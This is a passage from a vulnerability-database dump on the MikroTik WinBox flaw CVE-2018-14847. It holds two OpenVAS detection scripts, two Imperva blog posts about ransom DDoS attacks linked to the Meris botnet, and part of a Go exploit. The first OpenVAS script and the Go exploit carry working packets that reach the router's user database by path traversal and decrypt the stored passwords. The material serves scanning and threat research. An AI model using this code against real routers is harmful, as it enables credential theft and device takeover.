0x07, 0x01, 0x00, 0x00, 0x21,\n 0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,\n 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,\n 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,\n 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,\n 0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,\n 0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,\n 0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,\n 0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,\n 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,\n 0x00, 0x00);\n\nsend(socket: soc, data: query1);\nrecv = recv(socket: soc, length: 1024);\n\nif (!recv || strlen(recv) < 39) {\n close(soc);\n exit(0);\n}\n\nsessionid = recv[38];\n\nquery2 = raw_string(0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,\n 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,\n 0x00, 0xfe, 0x09, sessionid, 0x02, 0x00, 0x00, 0x08,\n 0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,\n 0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,\n 0x00, 0x02, 0x00, 0x00, 0x00);\n\nsend(socket: soc, data: query2);\nrecv = recv(socket: soc, length: 1024);\nclose(soc);\n\nif (!recv || \"M2\" >!< recv)\n exit(0);\n\nentries = split(recv, sep: \"M2\", keep: FALSE);\nforeach entry (entries) {\n # Username\n idx = stridx(entry, raw_string(0x01, 0x00, 0x00, 0x21)); # marker for username\n if (idx < 0)\n continue;\n\n user_len = ord(entry[idx + 4]);\n username = substr(entry, idx+5, idx+5+user_len-1);\n\n # Password\n idx = stridx(entry, raw_string(0x11, 0x00, 0x00, 0x21)); # marker for password\n if (idx < 0)\n continue;\n\n password = \"\";\n pw_len = ord(entry[idx + 4]);\n if (pw_len == 0) {\n password = \"No/empty password\";\n } else {\n pw = substr(entry, idx+5, idx+5+pw_len-1);\n key = MD5(username + '283i4jfkai3389');\n\n for (i=0; i < strlen(pw); i++) {\n char = ord(pw[i]) ^ ord(key[i % strlen(key)]);\n if (char == 0)\n break;\n else\n password += raw_string(ord(pw[i]) ^ ord(key[i % strlen(key)]));\n }\n }\n\n credentials += 'Username: ' + username + '\\nPassword: ' + password + '\\n\\n';\n}\n\nif (credentials) {\n report = 'It was possible to obtain the following credentials:\\n\\n' + credentials;\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:32:38", "description": "This host is running Mikrotik RouterOS and is prone to information disclosure\nvulnerability.", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813155", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:mikrotik:routeros\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813155\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 11:34:56 +0530 (Wed, 25 Apr 2018)\");\n\n script_cve_id(\"CVE-2018-14847\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Mikrotik RouterOS and is prone to information disclosure\nvulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in the winbox service of routeros which allows\nremote users to download a user database file without successful authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to connect to the WinBox\nport and download a user database file. The remote user can then log in and take control of the router.\");\n\n script_tag(name:\"affected\", value:\"MikroTik Router OS versions 6.29 through 6.42, 6.43rcx prior to 6.43rc4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to MikroTik Router OS version 6.42.1 or 6.43rc4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://forum.mikrotik.com/viewtopic.php?t=133533\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mikrotik_router_routeros_consolidation.nasl\");\n script_mandatory_keys(\"mikrotik/detected\");\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE) ) exit(0);\nmikVer = infos['version'];\nmikPath = infos['location'];\n\nif (version_in_range(version:mikVer, test_version:\"6.29\", test_version2:\"6.42\")){\n fix = \"6.42.1\";\n} else if (mikVer == \"6.43rc1\" || mikVer == \"6.43rc2\" || mikVer == \"6.43rc3\"){\n fix = \"6.43rc4\";\n}\n\nif (fix) {\n report = report_fixed_ver(installed_version:mikVer, fixed_version:fix, install_path:mikPath);\n security_message( data: report, port: 0);\n exit( 0 );\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "impervablog": [{"lastseen": "2022-03-04T17:32:42", "description": "We are only at the beginning of 2022 and it looks like it is going to be an interesting year for the [Distributed Denial of Service](<https://www.imperva.com/products/ddos-protection-services/>) (DDoS) landscape. We recently mitigated a ransom DDoS attack on a single website which reached a rate of 2.5 million requests per second (Mrps). And while ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase. For example, we\u2019ve seen instances where the ransom note is included in the attack itself embedded into a URL request.\n\n_One of several ransom notes received by the customer before the attack started_\n\n## A ransom note as part of the attack? Really?\n\nYes. Increasingly, we are observing more cases like this where the ransom note has been included as part of the attack itself, perhaps as a reminder to the target to send their bitcoin payment. Of course once the target receives this note the attack is already underway adding a sense of urgency to the threat. In the case of the 2.5 Mrps DDoS attack, the target had received several warning ransom notes before the first attack began.\n\nThis tactic is not a one-off either. In the same DDoS attack, Imperva mitigated **over 12 million such embedded requests targeting** random URLs on the same site.\n\nThe following sinister message was incorporated into one of the URLs targeted.\n\nAnd the threats didn&#x27;t stop there. The following day on the same site, Imperva mitigated **over 15 million** requests this time with the URL containing a different message but using the same scare tactics warning the CEO that they are going to destroy the company\u2019s stock price if they don\u2019t pay up.\n\nTo show they mean business the attackers claim responsibility for a previous [attack on the service provider Bandwidth](<https://www.channelfutures.com/security/bandwidth-hit-with-ddos-attack-dealing-with-service-disruptions>), naming themselves the well-known Ransomware as a service (RaaS) operator REvil . _It is not clear however whether the threats were really made by the original REvil group or by an imposter._\n\n## 2.5 million requests per second in under a minute\n\nThroughout the course of the same day the targeted company was hit by several DDoS attacks; the largest of which lasted less than one minute and measured up to 2.5 Mrps, setting a new mitigation record for Imperva. Multiple sites from the same company came under attack with one site sustaining an attack lasting around 10 minutes. The attackers applied sophisticated tactics to avert mitigation with the ransom messages and attack vectors changing constantly. At the same time, to shock the target, the payment amounts demanded kept increasing in size. Despite these tactics Imperva successfully mitigated all of the attacks and demonstrated how important it is to have a fast, accurate and automated DDoS solution in place.\n\nThe story did not end there for the customer as the attacks continued for several days; sometimes lasting up to several hours and in 20 percent of cases reaching a size of between 90 and 750 thousand requests per second (Krps) as the chart below shows.\n\n## Attack origins\n\nThe attacks originated from 34,815 sources and looking at the number of requests per source, there were 2 million requests per IP sent from the top sources during the attack.\n\nThe top source locations for the **2.5 Mrps** attack were Indonesia followed by the United States. And we have seen a pattern emerging of almost identical source locations for different attacks indicating that the same botnet was used many times.\n\n## The botnet\n\nWe have a strong indication that the Meris botnet played a role in these attacks. Although [CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>) was published a while ago, attackers can still take advantage of it. The CVE refers to a MikroTik vulnerability where thousands of internet of things (IoT) devices, in this case a huge number of MikroTik routers, were manipulated to create a botnet network which can still be used to carry out DDoS and other forms of attack.\n\nIn terms of bandwidth, the results reached a volume of 1.5Gbps of TCP traffic. The dashboard below represents the traffic in our scrubbing centers, before it reached our proxies that mitigated the attacks in the application layer:\n\n## Threat intelligence and Bot protection\n\nDespite the changing attack patterns, Imperva successfully mitigated the attacks within seconds using mainly threat intelligence, as the sources were known to us as malicious; and bot protection, as the clients were impersonating a legitimate browser or google bot. While the largest attack measured 2.5 Mrps the graph below shows how we blocked over 64 million requests in under one minute.\n\n## Repeat performance\n\nWe have since monitored a repeat of this attack pattern against several other customers. While each of the targets receives a unique bitcoin address they are all part of the same coordinated attack.\n\nThe types of sites the threat actors are after appear to be business sites focusing on sales and communications. Targets tend to be US- or Europe-based with the one thing they all have in common being that they are all exchange-listed companies and the threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price. See example below.\n\n## Ransom within a ransom\n\nAnother example of a threat embedded in the attack itself was found in a GET request sent with a link to a notepad.com note.\n\nAnother note (below) contains the now familiar pattern of a ransom demand for payment in bitcoin.\n\n## What&#x27;s Next?\n\nAs the REvil threat gang mentioned, we can expect more of the same throughout 2022. If you don\u2019t already have DDoS Protection in place, now is a good time to prepare for a potential attack. Find out more about Imperva DDoS Protection [here](<https://www.imperva.com/products/ddos-protection-services/>).\n\nThe post [Imperva Mitigates Ransom DDoS Attack Measuring 2.5 Million Requests per Second](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2022-03-04T15:21:44", "type": "impervablog", "title": "Imperva Mitigates Ransom DDoS Attack Measuring 2.5 Million Requests per Second", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-04T15:21:44", "id": "IMPERVABLOG:941443220F7C778862BC45A189850EF6", "href": "https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-31T16:22:26", "description": "> Imperva has just released the [**DDoS Threat Landscape Report Q1 2022**](<https://www.imperva.com/resources/resource-library/reports/ddos-threat-landscape-report/>). [Download it now](<https://www.imperva.com/resources/resource-library/reports/ddos-threat-landscape-report/>) to familiarize yourself with new threats and get detailed information about current DDoS attack patterns and their potential impact on your business.\n\nSo far, 2022 has been a brutal year for DDoS attacks and we see the attack landscape becoming more problematic going forward. As we consider the changing threat landscape worldwide, let\u2019s look at the top three DDoS attacks that Imperva has stopped to gain a bit of insight into the shape of future attacks.\n\n 1. [February 2022 \u2013 A Layer 7 Application DDoS Attack measuring over 2.5 million rps](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>)\n 2. [July 2021 \u2013 A Network DDoS attack with a throughput of 1.02 Tbps](<https://www.imperva.com/blog/imperva-mitigates-largest-ever-ddos-attack-on-a-customer/>)\n 3. [October 2020 \u2013 The Largest Network DDoS attack of almost 1 Tbps](<https://www.imperva.com/blog/ddos-attacks-grow-more-sophisticated-as-imperva-mitigates-largest-attack/>)\n\n## The October 2020 attack\n\nIn the fall of 2020, we observed a rise in the number of [DDoS attacks](<https://www.imperva.com/learn/ddos/ddos-attacks/>) against our customers where both the volume of attacks and their level of intensity has increased significantly. One such attack (mentioned above) peaked at nearly 1 terabyte per second (Tbps), a level of intensity that at the time broke Imperva\u2019s record for attack mitigation to date.\n\nIt wasn\u2019t just the scale of the attack that made it interesting and somewhat terrifying, it was also its sophisticated nature compared to other attacks of this size, which commonly consisted of [amplification vectors](<https://www.imperva.com/learn/ddos/ntp-amplification/>).\n\n### Two waves of Large SYN and TCP\n\nIn this case, the attackers combined two separate vectors, Large SYN and TCP, which they leveraged in two waves. The first consisted of a 90-second burst of [Large SYN flood](<https://www.imperva.com/learn/ddos/syn-flood/>) \u2013 basically a SYN flood with a large payload, unrecognized by the RFC, the document that describes a SYN packet. A SYN flood consumes server resources by creating endless half-open TCP connections. The combination of server exhaustion by SYN flood with a volumetric attack is what makes a large SYN vector so harmful. This initial burst was so powerful that it peaked at 674 Gbps and 148 million packets per second (Mpps) in under five seconds, emphasizing how important it is to start mitigation within seconds. Furthermore, this type of attack would be impossible to mitigate with an on-premise or [hybrid DDoS approach](<https://www.imperva.com/blog/hybrid-ddos-protection-is-like-a-faulty-airbag/>) where the upstream connectivity would be overwhelmed.\n\nWhat\u2019s also interesting about this particular attack is that the attackers used a tool similar to that seen in [the largest packets per-second attack](<https://www.imperva.com/blog/this-ddos-attack-unleashed-the-most-packets-per-second-ever-heres-why-thats-important/>) Imperva mitigated in 2019. The tool attempts to conceal the attacking packets as legitimate traffic by mimicking an Operating System. However, the tool apparently contains a bug because it ends up sending malformed packets.\n\nThe second wave of the attack consisted of a TCP ACK flood aimed at port 443, which mimicked the customer\u2019s legitimate traffic by using large HTTPs packets. Despite the customer owning multiple IP ranges, the entire attack targeted only a handful of IPs \u2013 in this case, those hosting the customer\u2019s main services. This suggests that a certain amount of research and reconnaissance had been undertaken by the attacker in advance, enabling them to identify the most vulnerable target IPs and carry out a more sophisticated attack.\n\nWe concluded that this wasn\u2019t a random DDoS attack. The attackers had done their research, enabling them to carry out a highly sophisticated and targeted attack tailored to the customer. We suspect more to come in 2022.\n\n## The July 2021 attack\n\nIn July 2021, Imperva mitigated its largest attack to date as a provider of DDoS protection, and one of the largest DDoS attacks overall that year. The attack lasted for 40 minutes and generated a massive throughput of 1.02 Tbps and 155 million packets per second (Mpps). Imperva also mitigated a large layer 7 DDoS attack in July 2020 which, as with the most recent attack, targeted services hosting online gambling sites making it difficult to rule out a link to the Olympic Games.\n\nThe attackers began by launching a volumetric DNS amplification attack on multiple sources in addition to a high rate SYN flood attack on port 80. The first wave of the attack reached 192 gigabytes per second (Gbps) and 33 million packets per second (Mpps). After only several minutes the attack reached its peak of 1.02 Tbps and 155 Mpps and at that time consisted of a combination of vectors including SYN flood, large SYN, UDP flood and DNS amplification.\n\nIn the days following this event, Imperva also mitigated a second sizable attack which peaked at a bandwidth of 858 Gbps and 225 million PPS. This time the attack was longer, lasting two hours, and targeted a specific network prefix (/24 C-Class address) with the attack spanning the entire range of IPs.\n\n## The February 2022 attack\n\nThis case was a ransom DDoS attack on a single website that reached a rate of 2.5 million requests per second (Mrps). And while ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase.\n\nThroughout the course of a single day the targeted company was hit by several DDoS attacks; the largest that we just mentioned measured 2.5 Mrps, was on a single site and lasted less than one minute, which is the current mitigation record for Imperva. In addition to that, multiple sites from the same company came under attack, with one site sustaining an attack lasting around 10 minutes. The attackers applied sophisticated tactics to avert mitigation with the ransom messages and attack vectors changing constantly. At the same time, to shock the target, the payment amounts demanded kept increasing in size. Despite these tactics, Imperva successfully mitigated all of the attacks and demonstrated how important it is to have a fast, accurate, and automated DDoS solution in place. The story did not end there for the customer as the attacks continued for several days; sometimes lasting up to several hours and in 20 percent of cases reaching a size of between 90 and 750 thousand requests per second (Krps) as the chart below shows.\n\nThe attacks originated from 34,815 sources and looking at the number of requests per source, there were 2 million requests per IP sent from the top sources during the attack. The top source locations for the 2.5 Mrps attack were Indonesia followed by the United States. And we have seen a pattern emerging of almost identical source locations for different attacks indicating that the same botnet was used many times.\n\nWe have a strong indication that the Meris botnet played a role in these attacks. Although CVE-2018-14847 was published a while ago, attackers can still take advantage of it. The CVE refers to a MikroTik vulnerability where thousands of internet of things (IoT) devices, in this case a huge number of MikroTik routers, were manipulated to create a botnet network that can still be used to carry out DDoS and other forms of attack.\n\n## Get the DDoS protection you need now\n\nWhy are we taking this stroll down (bad) memory lane? More than anything, we want to help our customers and prospective customers to be aware of current and future DDoS risks so they have the capacity to mitigate them should a large attack come. As we consider the dynamic and concerning threat landscape that we have already observed this year, now is as good a time as ever to urge every organization to assess readiness and if necessary, take action.\n\nAs you have seen, [DDoS Protection](<https://www.imperva.com/products/ddos-protection-services/>) secures all your assets at the edge for uninterrupted operation. without affecting the flow of business-critical traffic. [Contact us](<https://www.imperva.com/contact-us/>) to learn how to get started.\n\nThe post [The 3 Biggest DDoS Attacks Imperva Has Mitigated](<https://www.imperva.com/blog/the-3-biggest-ddos-attacks-imperva-has-mitigated/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-31T15:12:48", "type": "impervablog", "title": "The 3 Biggest DDoS Attacks Imperva Has Mitigated", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-05-31T15:12:48", "id": "IMPERVABLOG:C35627F2B3AFD564AE9A15BFC7474967", "href": "https://www.imperva.com/blog/the-3-biggest-ddos-attacks-imperva-has-mitigated/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:34", "description": "\nMikrotik WinBox 6.42 - Credential Disclosure (golang)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-08-17T00:00:00", "type": "exploitpack", "title": "Mikrotik WinBox 6.42 - Credential Disclosure (golang)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-17T00:00:00", "id": "EXPLOITPACK:34440D2AB17F925EB3B4582B358E548F", "href": "", "sourceData": "/*\n\n# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )\n# Author: Maxim Yefimenko ( @slider )\n# Date: 2018-08-06\n# Sotware Link: https://mikrotik.com/download\n# Vendor Page: https://www.mikrotik.com/\n# Version: 6.29 - 6.42\n# Tested on: Fedora 28 \\ Debian 9 \\ Windows 10 \\ Android ( wherever it was possible to compile.. it's golang ^_^ )\n# CVE: CVE-2018-14847\n# References:\n# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/\n# ( BasuCert ) https://github.com/BasuCert/WinboxPoC\n# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp\n# and special thanks to Dmitriy_Area51\n\n*/\n\npackage main\n\nimport (\n\t\"crypto/md5\"\n\t\"fmt\"\n\t\"net\"\n\t\"os\"\n\t\"strings\"\n\t\"time\"\n)\n\nvar (\n\ta = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,\n\t\t0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,\n\t\t0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,\n\t\t0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,\n\t\t0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,\n\t\t0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,\n\t\t0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,\n\t\t0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,\n\t\t0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,\n\t\t0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,\n\t\t0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,\n\t\t0x00, 0x00}\n\n\tb = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,\n\t\t0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,\n\t\t0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,\n\t\t0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,\n\t\t0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,\n\t\t0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,\n\t\t0x00, 0x02, 0x00, 0x00, 0x00}\n\n\tbuf = make([]byte, 1024*8)\n)\n\nfunc checkErr(err error) {\n\tif err != nil {\n\t\tfmt.Println(\"Error:\" + err.Error())\n\t}\n}\n\nfunc decryptPassword(user []byte, passEnc []byte) string {\n\tvar passw []byte\n\thasher := md5.New()\n\thasher.Write(user)\n\thasher.Write([]byte(\"283i4jfkai3389\"))\n\tkey := hasher.Sum(nil)\n\n\tfor i := 0; i < len(passEnc); i++ {\n\t\tpassw = append(passw, passEnc[i]^key[i%len(key)])\n\t}\n\n\treturn string(ASCIIonly(passw))\n}\n\nfunc ASCIIonly(s []byte) []byte {\n\tfor i, c := range s {\n\t\tif c < 32 || c > 126 {\n\t\t\treturn s[:i]\n\t\t}\n\t}\n\treturn s\n}\n\nfunc extractPass(buff []byte) (s []string) {\n\tvar (\n\t\tusr []byte\n\t\tpwd []byte\n\t)\n\n\t//searching for StartOfRecord\n\tfor i := 0; i < len(buff); i++ {\n\n\t\tif i+2 >= len(buff) {\n\t\t\tbreak\n\t\t}\n\n\t\tif (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {\n\t\t\t// fmt.Printf(\"Probably user record at offset 0x%.5x\\n\", i)\n\n\t\t\t//some bytes ahead is enable/disable flag\n\t\t\ti += int((buff[i+2] - 5))\n\t\t\tif i >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\t//searching for StartOfRecNumber\n\t\t\tif i+3 >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tfor !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {\n\t\t\t\ti++\n\t\t\t\tif i+3 >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ti += 4\n\t\t\tif i >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\t// fmt.Printf(\"SORn: 0x%X\\n\", i)\n\n\t\t\t// comment?\n\t\t\ti += 18\n\t\t\tif (i + 4) >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {\n\t\t\t\tif (i+1)+int(buff[i]) >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\ti += int(buff[i])\n\t\t\t} else {\n\t\t\t\ti -= 18\n\t\t\t}\n\n\t\t\t//searching for StartOfPassword\n\t\t\tif i+4 >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tfor !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {\n\t\t\t\ti++\n\t\t\t\tif i+4 >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\ti += 5\n\t\t\tif (i + 3) >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tif (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {\n\t\t\t\tpwd = buf[i-1+1 : int(buf[i-1])+i-1+1]\n\t\t\t\ti += int(buff[i-1])\n\t\t\t}\n\n\t\t\t//searching for StartOfUsername\n\t\t\tif i+3 >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tfor !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {\n\t\t\t\ti++\n\t\t\t\tif i+3 >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ti += 4\n\t\t\tif i >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif buff[i] != 0x00 {\n\t\t\t\tif i+int(buff[i]) >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tusr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])\n\t\t\t\ti += int(buff[i])\n\t\t\t}\n\n\t\t\tdecrypted := decryptPassword(usr, pwd)\n\t\t\t//fmt.Printf(\" --> %s\\t%s\\n\", buff[i], decrypted)\n\n\t\t\tif len(usr) != 0 {\n\t\t\t\ts = append(s, strings.Join([]string{string(usr), string(decrypted)}, \":\"))\n\t\t\t}\n\n\t\t}\n\t}\n\n\treturn s\n}\n\nfunc main() {\n\n\tif len(os.Args) < 2 {\n\t\tfmt.Printf(\" [ usage: %s 192.168.88.1\\n\\n\", os.Args[0])\n\t\tos.Exit(0)\n\t}\n\n\tconn, err := 